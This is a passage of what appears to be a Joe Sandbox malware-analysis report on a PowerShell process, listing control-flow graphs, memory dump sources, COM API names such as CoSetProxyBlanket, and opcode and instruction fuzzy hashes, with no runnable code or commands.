52->57 58 7ffd34217395-7ffd342173a0 52->58 53->52 57->58 62 7ffd342173a2-7ffd342173b3 call 7ffd34214ec0 58->62 63 7ffd342173b8-7ffd342173c3 58->63 62->63 66 7ffd342173c5-7ffd342173d6 call 7ffd34215070 63->66 67 7ffd342173db-7ffd342173e7 63->67 66->67 69 7ffd3421772d-7ffd34217739 67->69 70 7ffd342173ed-7ffd3421742b 67->70 71 7ffd34217790-7ffd3421779c 69->71 72 7ffd3421773b-7ffd34217747 69->72 70->66 89 7ffd3421742d-7ffd34217431 70->89 73 7ffd3421779e-7ffd342177aa 71->73 74 7ffd342177f3-7ffd342177fe 71->74 72->71 75 7ffd34217749-7ffd3421778b call 7ffd34215218 call 7ffd34215210 call 7ffd34215078 72->75 73->74 77 7ffd342177ac-7ffd342177ee call 7ffd34215218 call 7ffd34215210 call 7ffd34215078 73->77 78 7ffd34217800-7ffd3421780c call 7ffd34214ea0 74->78 79 7ffd34217811-7ffd3421781d 74->79 75->71 77->74 78->79 84 7ffd34217823-7ffd3421782c 79->84 85 7ffd34217909-7ffd34217914 79->85 84->85 87 7ffd34217922-7ffd34217935 85->87 88 7ffd34217916-7ffd3421791d call 7ffd34215090 85->88 96 7ffd34217960-7ffd3421796c 87->96 97 7ffd34217937-7ffd34217945 87->97 88->87 100 7ffd3421770f-7ffd34217728 call 7ffd34215208 call 7ffd34214f90 89->100 101 7ffd34217437-7ffd34217443 89->101 105 7ffd34217972-7ffd342179cd 96->105 106 7ffd34217aa5-7ffd34217ab1 96->106 102 7ffd34217951-7ffd3421795b call 7ffd34214ed0 97->102 103 7ffd34217947 97->103 100->69 109 7ffd34217667-7ffd34217673 101->109 110 7ffd34217449-7ffd3421745b 101->110 102->96 103->102 142 7ffd342179d3-7ffd342179e7 105->142 143 7ffd34217b8c 105->143 107 7ffd34217aed-7ffd34217af8 106->107 108 7ffd34217ab3-7ffd34217abf 106->108 116 7ffd34217afe-7ffd34217b09 107->116 117 7ffd34217cf0-7ffd34217cfb 107->117 108->107 115 7ffd34217ac1-7ffd34217ae8 call 7ffd34215098 108->115 109->69 122 7ffd34217679-7ffd3421768a 109->122 118 7ffd34217461-7ffd3421746e 110->118 119 7ffd34217615-7ffd34217662 call 7ffd34214e68 110->119 115->107 116->117 126 7ffd34217b0f-7ffd34217b55 call 7ffd34215050 call 7ffd34214f18 116->126 124 7ffd34217cfd-7ffd34217d04 call 7ffd34215050 117->124 125 7ffd34217d09-7ffd34217d32 call 7ffd34214e80 117->125 127 7ffd342175e2-7ffd342175ec 118->127 128 7ffd34217474-7ffd34217497 118->128 119->109 130 7ffd342176bb-7ffd3421770d call 7ffd34214e68 122->130 131 7ffd3421768c-7ffd342176a3 122->131 124->125 166 7ffd34217dae-7ffd34217dc2 125->166 167 7ffd34217d34 125->167 206 7ffd34217b7e-7ffd34217b8a call 7ffd34214f08 126->206 207 7ffd34217b57-7ffd34217b78 call 7ffd34214f18 126->207 146 7ffd342175ee-7ffd342175f2 127->146 147 7ffd342175f4-7ffd342175f5 127->147 150 7ffd342174f6-7ffd34217500 128->150 151 7ffd34217499-7ffd3421749b 128->151 130->69 131->130 144 7ffd342179e9-7ffd34217a1c 142->144 145 7ffd34217a4b-7ffd34217aa0 call 7ffd34214ee0 142->145 161 7ffd34217b91-7ffd34217b98 call 7ffd34214f18 143->161 144->145 145->106 153 7ffd342175f8-7ffd3421760f 146->153 147->153 165 7ffd3421750a-7ffd34217519 150->165 158 7ffd3421749d-7ffd342174c0 151->158 159 7ffd342174ca-7ffd34217500 151->159 153->118 153->119 186 7ffd3421751f-7ffd3421754b 158->186 187 7ffd342174c2-7ffd342174c4 158->187 159->165 176 7ffd34217b9d-7ffd34217bc1 call 7ffd34215238 call 7ffd34214ef0 161->176 173 7ffd34217d36 167->173 174 7ffd34217cbb-7ffd34217cc9 call 7ffd34214e80 167->174 179 7ffd34217d3a-7ffd34217d42 173->179 174->179 191 7ffd34217ccb-7ffd34217ccf 174->191 201 7ffd34217bc3-7ffd34217bca call 7ffd34215060 176->201 202 7ffd34217bd4-7ffd34217bd5 176->202 192 7ffd34217d50-7ffd34217d58 179->192 187->127 187->159 191->192 198 7ffd34217cd1-7ffd34217cd8 191->198 192->59 204 7ffd34217d54-7ffd34217d58 198->204 205 7ffd34217cda-7ffd34217cdf 198->205 215 7ffd34217bcf 201->215 209 7ffd34217bd7-7ffd34217be3 call 7ffd34214ef0 202->209 204->59 212 7ffd34217d60-7ffd34217d72 205->212 213 7ffd34217ce1-7ffd34217cee 205->213 206->176 207->209 224 7ffd34217b7a-7ffd34217b7c 207->224 225 7ffd34217be5-7ffd34217bf4 call 7ffd34214ef0 209->225 226 7ffd34217bfa-7ffd34217c59 call 7ffd34214f78 call 7ffd34215190 call 7ffd34215198 209->226 212->166 213->59 215->59 224->161 224->206 225->226 232 7ffd34217ca5-7ffd34217cb0 225->232 238 7ffd34217c5a-7ffd34217ca0 call 7ffd34215058 226->238 237 7ffd34217cb2-7ffd34217cb8 232->237 232->238 237->174 238->59
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4745123000.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34200000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: x`F4$x`F4
                                                            • API String ID: 0-2418214529
                                                            • Opcode ID: 7cd1a8aa799ae5cc5402115adaaabc0397bf43e110616421a30bb356d4342a23
                                                            • Instruction ID: a36281b3e5a922dc34ca9aeaa61af6820af099070a6cca59d740af30fbb29397
                                                            • Opcode Fuzzy Hash: 7cd1a8aa799ae5cc5402115adaaabc0397bf43e110616421a30bb356d4342a23
                                                            • Instruction Fuzzy Hash: FD828434B18A498FEB95EB18C8A5BA973E1FF99300F5441B9D41DD72D2CE39AC42DB40

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4745123000.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34200000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3261581ca2898329d786e68b2120fbaed8dcbab825373b7ecc2ca65fe4379fe5
                                                            • Instruction ID: e909f075c71719543bcfbf3685f38faac536ad51db87d3bcc09ba1b8dafa9794
                                                            • Opcode Fuzzy Hash: 3261581ca2898329d786e68b2120fbaed8dcbab825373b7ecc2ca65fe4379fe5
                                                            • Instruction Fuzzy Hash: 31B18C31A0CA484FEB69DB6C98997F97BE1EF96310F04017ED04ED3292DE6DA842C741

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 470 7ffd3421888c-7ffd34218893 471 7ffd3421889e-7ffd3421896c CoSetProxyBlanket 470->471 472 7ffd34218895-7ffd3421889d 470->472 475 7ffd3421896e 471->475 476 7ffd34218974-7ffd3421899a 471->476 472->471 475->476
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4745123000.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34200000_powershell.jbxd
                                                            Similarity
                                                            • API ID: BlanketProxy
                                                            • String ID:
                                                            • API String ID: 3890896728-0
                                                            • Opcode ID: a836cf29aaa6d51df99e64adc44277bef7b47d264f091ce067fe1e01f662502b
                                                            • Instruction ID: eb2eeac126e1fd9ee97d4d0d1769e0ce70f492b7e64dda3266ec216aeb56d8f1
                                                            • Opcode Fuzzy Hash: a836cf29aaa6d51df99e64adc44277bef7b47d264f091ce067fe1e01f662502b
                                                            • Instruction Fuzzy Hash: DA41083191CB488FDB18DB5CD84A6E97BF0FB6A320F14022FE049D3252CA75A856CB81

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 478 7ffd34212f4a-7ffd342188df 480 7ffd342188e6-7ffd3421896c CoSetProxyBlanket 478->480 481 7ffd3421896e 480->481 482 7ffd34218974-7ffd3421899a 480->482 481->482
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4745123000.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34200000_powershell.jbxd
                                                            Similarity
                                                            • API ID: BlanketProxy
                                                            • String ID:
                                                            • API String ID: 3890896728-0
                                                            • Opcode ID: ff85b3f7cd99df7516da3d97946b08e99e5a77024a5e8a245d08bcabe0620df7
                                                            • Instruction ID: 20aa8d07a8c5fdee7d3442ff32c678ddbc5278226380f46c28ba39c89a43f9c6
                                                            • Opcode Fuzzy Hash: ff85b3f7cd99df7516da3d97946b08e99e5a77024a5e8a245d08bcabe0620df7
                                                            • Instruction Fuzzy Hash: E031A47191CA0C9FDB18DF5CD849AF97BE1FBA9321F10422EE049D3211CA75A8528BC5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 484 7ffd34219144-7ffd3421914b 485 7ffd3421914d-7ffd34219155 484->485 486 7ffd34219156-7ffd34219208 ObjectStublessClient3 484->486 485->486 489 7ffd34219210-7ffd3421922d 486->489 490 7ffd3421920a 486->490 490->489
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4745123000.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34200000_powershell.jbxd
                                                            Similarity
                                                            • API ID: Client3ObjectStubless
                                                            • String ID:
                                                            • API String ID: 3839999677-0
                                                            • Opcode ID: b25cd627af5e9f4c334da0dbbe9f7fa563b4d6d0393f01258d77449632eebca9
                                                            • Instruction ID: 2457d8707b0bbb46381e90de6fb6bd54c8a74eb0e5d289ce5d07b2a8616c5956
                                                            • Opcode Fuzzy Hash: b25cd627af5e9f4c334da0dbbe9f7fa563b4d6d0393f01258d77449632eebca9
                                                            • Instruction Fuzzy Hash: E531E731A0CA4C4FDB1CDB5C984A6F97BE1FB96321F00422FD049D3252CB756856CB91

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 491 7ffd3421ba99-7ffd3421ba9d 492 7ffd3421ba9f 491->492 493 7ffd3421baa5 491->493 492->493 494 7ffd3421baa8-7ffd3421bab9 493->494 495 7ffd3421baa7 493->495 496 7ffd3421babc-7ffd3421bb56 IUnknown_QueryInterface_Proxy 494->496 497 7ffd3421babb 494->497 495->494 500 7ffd3421bb5e-7ffd3421bb7b 496->500 501 7ffd3421bb58 496->501 497->496 501->500
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4745123000.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34200000_powershell.jbxd
                                                            Similarity
                                                            • API ID: Interface_ProxyQueryUnknown_
                                                            • String ID:
                                                            • API String ID: 2522245112-0
                                                            • Opcode ID: 700cb2722b088497544dd91fe8c333e9ec95133e224a226807a5cb5525a9ee17
                                                            • Instruction ID: 556f94c96f89bce64a74d6425865aaf1aa57f65ae34c8d14a707253a12ab84ff
                                                            • Opcode Fuzzy Hash: 700cb2722b088497544dd91fe8c333e9ec95133e224a226807a5cb5525a9ee17
                                                            • Instruction Fuzzy Hash: 84312B31A1CB884FDB259BAC9C5A6F67FF4EB57321F04017FE089D3152DA256846C782

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 502 7ffd3421b48d-7ffd3421b491 503 7ffd3421b493 502->503 504 7ffd3421b499 502->504 503->504 505 7ffd3421b49c-7ffd3421b4ad 504->505 506 7ffd3421b49b 504->506 507 7ffd3421b4b0-7ffd3421b546 ObjectStublessClient4 505->507 508 7ffd3421b4af 505->508 506->505 511 7ffd3421b54e-7ffd3421b56b 507->511 512 7ffd3421b548 507->512 508->507 512->511
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4745123000.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34200000_powershell.jbxd
                                                            Similarity
                                                            • API ID: Client4ObjectStubless
                                                            • String ID:
                                                            • API String ID: 2145431975-0
                                                            • Opcode ID: 483b578ebcd5b8d2da520254fc0821557bd2c3d3dd2e9fac3b5cdf71d44f7644
                                                            • Instruction ID: 6cc161a4fcf644ced0ae186c8d23f3841fc5946f9be29cca4336d7a6aae991e0
                                                            • Opcode Fuzzy Hash: 483b578ebcd5b8d2da520254fc0821557bd2c3d3dd2e9fac3b5cdf71d44f7644
                                                            • Instruction Fuzzy Hash: 9D31683191CB884FDB29AB6C9C5A6B67FF0EF57321F04406FE089C3153DA25684AC782

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 535 7ffd342d3e1d-7ffd342d3ea4 537 7ffd342d3eaa-7ffd342d3eb4 535->537 538 7ffd342d4084-7ffd342d40ba 535->538 539 7ffd342d3eb6-7ffd342d3ec3 537->539 540 7ffd342d3ecd-7ffd342d3ed2 537->540 557 7ffd342d40bc-7ffd342d40e3 538->557 558 7ffd342d40e5-7ffd342d4115 538->558 539->540 550 7ffd342d3ec5-7ffd342d3ecb 539->550 541 7ffd342d4025-7ffd342d402f 540->541 542 7ffd342d3ed8-7ffd342d3edb 540->542 548 7ffd342d4031-7ffd342d403c 541->548 549 7ffd342d403e-7ffd342d4081 541->549 545 7ffd342d3ef2 542->545 546 7ffd342d3edd-7ffd342d3ef0 542->546 553 7ffd342d3ef4-7ffd342d3ef6 545->553 546->553 548->549 549->538 550->540 553->541 556 7ffd342d3efc-7ffd342d3f33 553->556 574 7ffd342d3f35-7ffd342d3f55 556->574 575 7ffd342d3f57 556->575 557->558 568 7ffd342d4117 558->568 569 7ffd342d4118-7ffd342d4129 558->569 568->569 570 7ffd342d412b 569->570 571 7ffd342d412c-7ffd342d4158 569->571 570->571 577 7ffd342d419a-7ffd342d419b 571->577 578 7ffd342d415a-7ffd342d4160 571->578 576 7ffd342d3f59-7ffd342d3f5b 574->576 575->576 576->541 580 7ffd342d3f61-7ffd342d3f64 576->580 583 7ffd342d41b4-7ffd342d41e7 577->583 584 7ffd342d419d-7ffd342d419e 577->584 581 7ffd342d41a2-7ffd342d41aa 578->581 582 7ffd342d4162-7ffd342d4199 578->582 587 7ffd342d3f7b 580->587 588 7ffd342d3f66-7ffd342d3f79 580->588 581->583 593 7ffd342d41ac-7ffd342d41b2 581->593 582->577 601 7ffd342d41e9-7ffd342d41fc 583->601 602 7ffd342d41fd-7ffd342d4203 583->602 584->581 592 7ffd342d3f7d-7ffd342d3f7f 587->592 588->592 592->541 595 7ffd342d3f85-7ffd342d3f92 592->595 593->583 599 7ffd342d3fa6-7ffd342d3fe3 595->599 600 7ffd342d3f94-7ffd342d3fa5 595->600 609 7ffd342d3fe5-7ffd342d3ffd 599->609 610 7ffd342d3fff-7ffd342d4001 599->610 600->599 601->602 609->610 612 7ffd342d4008-7ffd342d4023 610->612 612->541
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4746193291.00007FFD342D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd342d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a1d52374609b755fb6c03dd42549e00e09144100c03363c476d5cb57c9e45965
                                                            • Instruction ID: 4dc8c0b63f796822b3b9c1996a5be6152035d88735aa6f754fed937dce32610c
                                                            • Opcode Fuzzy Hash: a1d52374609b755fb6c03dd42549e00e09144100c03363c476d5cb57c9e45965
                                                            • Instruction Fuzzy Hash: 77D12416B0FAC60FE76A972848B55B5BFE1EF57210B0801FAD1ADDB1D3D91DA806C342
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4744059447.00007FFD340ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd340ed000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 109582233edda87fb60034aba8cf18b746dfad755cd480024285a381596fec17
                                                            • Instruction ID: db41a4afa74813772e4c46335700048fcb1464181c5bde0615f8daf161fac6f0
                                                            • Opcode Fuzzy Hash: 109582233edda87fb60034aba8cf18b746dfad755cd480024285a381596fec17
                                                            • Instruction Fuzzy Hash: C641367150DFC48FE7569B3898959523FF0EF53360B1901DFD088CB0A3D629A846C7A2
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4746193291.00007FFD342D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd342d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 229ef25ddc5117054dfcd0c2c42e8555296d77a8e0960939e29495c9a18a58f4
                                                            • Instruction ID: 855ec73103dc65de1b4522d11a25e6e7544d9e82515ea5604bc3ace08ea8e805
                                                            • Opcode Fuzzy Hash: 229ef25ddc5117054dfcd0c2c42e8555296d77a8e0960939e29495c9a18a58f4
                                                            • Instruction Fuzzy Hash: 98312623B0FA590FF7B5D66C68652B8B7C1EF4A610B1802FBD569D71D2DD09AC0183C1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4746193291.00007FFD342D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd342d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 643ef1565e99f394f9772f47cc987915fa28ec08f1e79715445626aa6d5cd94b
                                                            • Instruction ID: 97b9de2d290ed467969cc3dbef6b60f0787b3885d6fad446ee1821d424a92a51
                                                            • Opcode Fuzzy Hash: 643ef1565e99f394f9772f47cc987915fa28ec08f1e79715445626aa6d5cd94b
                                                            • Instruction Fuzzy Hash: 81212932B0DE044FEB68EA5CA4515E8B3E1EF85330B1400BBD15AC31A3DA19FC45C780
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4746193291.00007FFD342D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd342d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e7532132da9209f64fa72852d66226a408aad00ed1cf35a5e0aad8f37eefd9f
                                                            • Instruction ID: 2ad519998ab13499865a899882a5ebe3956cdb09ad8685e8da88f077b3fc0353
                                                            • Opcode Fuzzy Hash: 2e7532132da9209f64fa72852d66226a408aad00ed1cf35a5e0aad8f37eefd9f
                                                            • Instruction Fuzzy Hash: 9021D532B0DA084FEBA5EA5CE4555E8B3E0EF86331B1410BBD15AD7193DA2AEC45C790
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4752873303.00007FFD34590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34590000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34590000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 987540a303803e87e308aea660d82b3b95826954d1908f74a38b91e535d4a0d0
                                                            • Instruction ID: 8fb59e6eba7d27f59f90d2fded5a5842b7b6efb565d2936ede54b5594907e971
                                                            • Opcode Fuzzy Hash: 987540a303803e87e308aea660d82b3b95826954d1908f74a38b91e535d4a0d0
                                                            • Instruction Fuzzy Hash: 7C11CA32F0DA894FE756EF9884E016477F2EF5A310F1800BED54DDB183DA29A841D351
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4745123000.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34200000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @}J4$P}J4$h~J4$p}J4$x~J4
                                                            • API String ID: 0-1595576702
                                                            • Opcode ID: 64f30a5631fb1c7c619dd039f87ac5530a6fd61bdf9e794f4f8ab59c053b9fa0
                                                            • Instruction ID: 41b850648eaf9884cc9add99fb434a61898d2f5a6ba229485ac684d91723ae83
                                                            • Opcode Fuzzy Hash: 64f30a5631fb1c7c619dd039f87ac5530a6fd61bdf9e794f4f8ab59c053b9fa0
                                                            • Instruction Fuzzy Hash: E781A06770D9910BE723976C7C661ED3B90DFA327574442B7C258DA083DD0E680E83D1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4745123000.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34200000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: bZ_H
                                                            • API String ID: 0-2489631691
                                                            • Opcode ID: 1f9c90cc70fed02f30c2ba64675820ab940a0935fdca24fbb55200d5ae5d75ae
                                                            • Instruction ID: 7d3f539605bf7c5c0675087ad5529d7fd108676247e6aacbc1479052f44aee69
                                                            • Opcode Fuzzy Hash: 1f9c90cc70fed02f30c2ba64675820ab940a0935fdca24fbb55200d5ae5d75ae
                                                            • Instruction Fuzzy Hash: 2A02E836B0CA4A8FDB55DF5CC4E5AE97BE1FF56310F1441BAC049E7192CE29A842C781
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4745123000.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34200000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #]K
                                                            • API String ID: 0-4283384526
                                                            • Opcode ID: d8ee59810b84f553c27534b86d23aa983624e50df83370a1af5508d2f937c48a
                                                            • Instruction ID: 78cbd70556d6bd915a9efa8a5fc54787c93743c9cddb7206a217e4a610b00663
                                                            • Opcode Fuzzy Hash: d8ee59810b84f553c27534b86d23aa983624e50df83370a1af5508d2f937c48a
                                                            • Instruction Fuzzy Hash: 20E1CB27B0D1561AF312B7BCBCE21EA7B64EF4223970C43B7D1D89D0539D1968CE82A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4745123000.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34200000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4
                                                            • API String ID: 0-4088798008
                                                            • Opcode ID: 3ec3829a6f3c6999607c899542ca620753d39dcf607cd4a58b5536463f9d9465
                                                            • Instruction ID: 6efe90459f0ae03f6907aa1bc73b1f74d36e6dd5cd05d86452eafbbffc63511a
                                                            • Opcode Fuzzy Hash: 3ec3829a6f3c6999607c899542ca620753d39dcf607cd4a58b5536463f9d9465
                                                            • Instruction Fuzzy Hash: 4171B09BB4E3C25EE753576A5CF60E53FA0EE5326570900F7C2D4DA093E90E180AD3A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4745123000.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34200000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %K_^
                                                            • API String ID: 0-2073550681
                                                            • Opcode ID: 91ec19a02502e6e8ad7dcdf19dcb53d311786a429a38a14e0d16837c63f013c0
                                                            • Instruction ID: 83d777a2967218481a692c0543b389568c6001f6b630cd290a929697ea934694
                                                            • Opcode Fuzzy Hash: 91ec19a02502e6e8ad7dcdf19dcb53d311786a429a38a14e0d16837c63f013c0
                                                            • Instruction Fuzzy Hash: DF71CA67A0D7D21FE753976C98F21D63FA0EF1322874942F7C1A8DA093ED0D684A9261
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4745123000.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34200000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f960404bea77f8182d9f413636aeff98a2cc19154a3aaadd6a6e55e8d5251a01
                                                            • Instruction ID: 022f2324b684a278db78a555f4ec2a7235d5c36be9670e3e16fa76a5083b6c6d
                                                            • Opcode Fuzzy Hash: f960404bea77f8182d9f413636aeff98a2cc19154a3aaadd6a6e55e8d5251a01
                                                            • Instruction Fuzzy Hash: 58D1C44BB0D6C21EF762577C5CB61E57FE0EF5322570901B3C6D4DA4A3AD0E184BA2A2
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4745123000.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34200000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f384f7711cc6ed1e07f8c5fcc733cd985afb0d079fe876f5d30fb31db2369566
                                                            • Instruction ID: 95c7b6b7f45c3866bfb0ddc675e11fe9a4dcd00efd4292f5efebaa570e215530
                                                            • Opcode Fuzzy Hash: f384f7711cc6ed1e07f8c5fcc733cd985afb0d079fe876f5d30fb31db2369566
                                                            • Instruction Fuzzy Hash: 1D7103ABF0DBD21BE752563D58F60EA3BA0EF2336470910B7C684D6093ED1E540BE652
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4745123000.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34200000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 57a9dbaa9f067621005879a34b4bd3e88351c088f99d5956d9dd4125553e2ae2
                                                            • Instruction ID: 1fffc23a3a2725fc91bb1f244f8e36e1c9e31aafe31d4878f79bcb3142678eaf
                                                            • Opcode Fuzzy Hash: 57a9dbaa9f067621005879a34b4bd3e88351c088f99d5956d9dd4125553e2ae2
                                                            • Instruction Fuzzy Hash: 9961B55BB0D7C21BE266876C1CB61E53FD1EF5326570A40F7C785D60A3AD1F180792A2
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4745123000.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34200000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 933f832d87773a273a194b10f119480ba464bbea36b7441c60d774dbfe8ee125
                                                            • Instruction ID: 7bda8fe40de0e4077965dabf3090d33b9a27afd14f09eac542a884cead96b158
                                                            • Opcode Fuzzy Hash: 933f832d87773a273a194b10f119480ba464bbea36b7441c60d774dbfe8ee125
                                                            • Instruction Fuzzy Hash: BC51625AB4D7D21FE763472858B62EA3FE4EF5336070A10B7C6C5D60939E4E28079262
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4752873303.00007FFD34590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34590000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34590000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6b4cb3308fd525b3af94d04ec5e34fc320f222db9d02ddddc7d3926ce471404f
                                                            • Instruction ID: 8577c6872308d1fad88f7f4b3eac1e3e369023f063b3b9224a1c83408ca8f8db
                                                            • Opcode Fuzzy Hash: 6b4cb3308fd525b3af94d04ec5e34fc320f222db9d02ddddc7d3926ce471404f
                                                            • Instruction Fuzzy Hash: E651475194E7D25FE39383B858A55923FF19F6B224B0E05EBD1C8CF0A3E94D580AD362
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4745123000.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ffd34200000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
